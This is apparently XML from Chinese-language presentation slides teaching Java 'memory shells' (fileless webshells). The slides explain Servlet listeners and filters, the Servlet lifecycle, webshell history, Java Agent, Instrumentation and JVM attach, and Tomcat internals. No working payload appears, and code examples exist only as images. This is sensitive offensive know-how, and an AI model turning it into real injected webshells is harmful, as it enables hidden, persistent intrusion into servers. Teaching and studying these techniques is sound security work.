              <a:t>适用于处理需要与用户会话相关的操作，如记录用户的活动或清理与用户会话相关的资源。</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en-US" altLang="zh-CN" b="1"/>
              <a:t>ServletRequestListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>(请求的创建和销毁)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用: 监听 HTTP 请求的生命周期事件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接口方法:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>requestInitialized(ServletRequestEvent sre): 在请求被创建时调用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>requestDestroyed(ServletRequestEvent sre): 在请求被销毁时调用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用途:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用于在请求处理开始和结束时执行一些逻辑，比如记录日志、添加请求属性等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>适用于处理每个单独的请求，例如，进行请求相关的初始化或清理操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>ServletContextListener：（上下文的初始化和销毁）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用: 监听 Servlet 上下文的生命周期事件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接口方法:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>contextInitialized(ServletContextEvent sce): 当 Servlet 上下文被初始化时调用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>contextDestroyed(ServletContextEvent sce): 当 Servlet 上下文被销毁时调用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用途:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用于在应用启动和关闭时执行一些逻辑，例如加载应用配置、初始化资源、注册服务、清理全局资源等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>适用于处理与整个 Web 应用相关的操作，而不仅限于单个请求或会话。</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en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的执行流程：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="309245" y="2161540"/>
            <a:ext cx="11391900" cy="1971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en-US" altLang="zh-CN"/>
              <a:t>Servlet取自两个单词：Server、Applet （很符合 sun 公司的命名特点）， Java Servlet 的简称，其实质就是运行在 Web 应用服务器上的 Java 程序，与普通 Java 程序不同，它是位于 Web 服务器内部的服务器端的 Java 应用程序，可以对 Web 浏览器或其他 HTTP 客户端程序发送的请求进行处理。狭义的Servlet是指Java语言实现的一个接口，广义的Servlet是指任何实现了这个Servlet接口的类，一般情况下，人们将Servlet理解为后者。Servlet运行于支持Java的应用服务器中。从原理上讲，Servlet可以响应任何类型的请求，但绝大多数情况下Servlet只用来扩展基于HTTP协议的Web服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Servlet 对象与普通的 Java 对象不同，它可以处理 Web 浏览器或其他 HTTP 客户端程序发送的 HTTP 请求，但前提是把 Servlet 对象布置到 Servlet 容器中，也就是说，其运行需要 Servlet 容器的支持。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>有了 Servlet 之后，用户通过单击某个链接或者直接在浏览器的地址栏中输入 URL 来访问 Servlet ，Web 服务器接收到该请求后，并不是将请求直接交给 Servlet ，而是交给 Servlet 容器。Servlet 容器实例化 Servlet ，调用 Servlet 的一个特定方法对请求进行处理， 并产生一个响应。这个响应由 Servlet 容器返回给 Web 服务器，Web 服务器包装这个响应，以 HTTP 响应的形式发送给 Web 浏览器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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en-US" altLang="zh-CN"/>
              <a:t>servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>生命周期：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>通常情况下，Servlet 容器也就是指 Web 容器，如 Tomcat、Jboss、Resin、Weblogic 等，它们对 Servlet 进行控制。当一个客户端发送 HTTP 请求时，由容器加载 Servlet 对其进行处理并做出响应。在 Web 容器中，Servlet 主要经历 4 个阶段，如下图：</a:t>
            </a:r>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="2185670"/>
            <a:ext cx="6595745" cy="2486025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7098665" y="3429000"/>
            <a:ext cx="4388485" cy="2466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en-US" altLang="zh-CN"/>
              <a:t>Servlet 与 Web 容器的关系是非常密切的，在 Web 容器中 Servlet 主要经历了 4 个阶段，这 4 个阶段实质是 Servlet 的生命周期，由容器进行管理。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>（1）在 Web 容器启动或者客户机第一次请求服务时，容器将加载 Servlet 类并将其放入到 Servlet 实例池。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>（2）当 Servlet 实例化后，容器将调用 Servlet 对象的 init() 方法完成 Servlet 的初始化操作，主要是为了让 Servlet 在处理请求之前做一些初始化工作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>（3）容器通过 Servlet 的 service() 方法处理客户端请求。在 Service() 方法中，Servlet 实例根据不同的 HTTP 请求类型作出不同处理，并在处理之后作出相应的响应。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>（4）在 Web 容器关闭时，容器调用 Servlet 对象的 destroy() 方法对资源进行释放。在调用此方法后，Servlet 对象将被垃圾回收器回收。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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sz="2000" b="1"/>
              <a:t>什么是内存马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由于现在互联网已经渗透到人们的方方面面，无时无刻离不开互联网的支撑，甚至也影响了全球文化、社会、经济的发展。而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作为互联网上应用范围最广、最典型的应用之一，在社会、经济活动中承担着重要角色，那么就会导致各种含金量极高的数据和信息由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接收、转发、处理和存储。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>给人们带来经济效益的同时也成为网络攻击的主要目标。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击在发现 Web 应用上传漏洞后会上传一个 Webshell。攻击者上传的Webshell 与网站管理员远程管理所使用的功能类似,通过 HTTP 请求接收命令并提供响应, 可穿越防火墙, 难以检测。Webshell 最初包含的功能强大, 但是文件较大、服务器端代码较多; 针对网站对文件大小上传的限制, 逐渐演变为代码量小、只有单一上传文件功能的小文件; 为了更加隐蔽, Webshell 配合管理工具, 只需简单的脚本执行语句即可; 为了更好的躲避检测, Webshell 还采用了加密、混淆等手段。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是随着时间的推演以及对传统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关注度越来越高导致检测手段和方法更加健全，所以基于内存的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就此诞生。所谓的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>内存马就是基于内存的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>也就是无文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是典型的无文件攻击的一种，由于近几年的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HVV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>演练的热度越来越高，内存马也成为被热议和研究的技术。内存马主要活跃在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框架、中间件等上，并且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以其灵活、健壮、跨平台等特点是主流的变成语言，所以本节课主要研讨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>马。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>早期的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：小马，大马，一句话木马。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="1214120"/>
            <a:ext cx="8497570" cy="5296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en-US" altLang="zh-CN"/>
              <a:t>Java Agent(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>探针</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java是一种静态强类型语言，在运行之前必须将其编译成.class字节码，然后再交给JVM处理运行。Java Agent就是一种能在不影响正常编译的前提下，修改Java字节码，进而动态地修改已加载或未加载的类、属性和方法的技术。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也就是它可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数执行之前做前置的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>preMain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用场景：热部署，诊断工具，全链路跟踪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4998085" y="2797175"/>
            <a:ext cx="4293235" cy="3216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zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Instrumentation接口：使用 Instrumentation，开发者可以构建一个独立于应用程序的代理程序（Agent），用来监测和协助运行在 JVM 上的程序，甚至能够替换和修改某些类的定义。有了这样的功能，开发者就可以实现更为灵活的运行时虚拟机监控和 Java 类操作了，这样的特性实际上提供了一种虚拟机级别支持的 AOP 实现方式，使得开发者无需对 JDK 做任何升级和改动，就可以实现某些 AOP 的功能了。在 Java SE 5 中，Instrument 要求在运行前利用命令行参数或者系统参数来设置代理类，在实际的运行之中，虚拟机在初始化之时（在绝大多数的 Java 类库被载入之前），启动instrumentation 的设置，从而可以在加载字节码之前,修改类的定义。在 Java SE6 里面，则更进一步,可以在jvm运行时,动态修改类定义,使用就更方便了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VirtualMachine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>字面意义表示一个Java 虚拟机，也就是程序需要监控的目标虚拟机，提供了获取系统信息、 loadAgent，Attach 和 Detach 等方法，可以实现的功能可以说非常之强大 。该类允许我们通过给attach方法传入一个jvm的pid(进程id)，远程连接到jvm上 。代理类注入操作只是它众多功能中的一个，通过loadAgent方法向jvm注册一个代理程序agent，在该agent的代理程序中会得到一个Instrumentation实例。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中有个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>premain()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和agentmain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法而在这两种方法中可以结合Instrumentation的特性来实现在启动和运行时动态侵入和改写某个类中的方法！！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>内存马的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>思路也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如此。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请看代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194435" y="2458720"/>
            <a:ext cx="2085975" cy="3400425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7703820" y="1953895"/>
            <a:ext cx="2782570" cy="41141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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在谈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tomcat</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4961890" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的本质是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>容器，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Catalina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的核心，其余的模块都是为核心做支撑服务的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>连接器Coyote提供连接通信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JSP引擎Jasper提供JSP引擎</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>表达式语言JavaEL提供EL表达式支持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>命名服务Naming提供JNDI服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>服务器日志Juli提供日志服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5766435" y="1336675"/>
            <a:ext cx="5108575" cy="4184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6419215" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Catalina结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
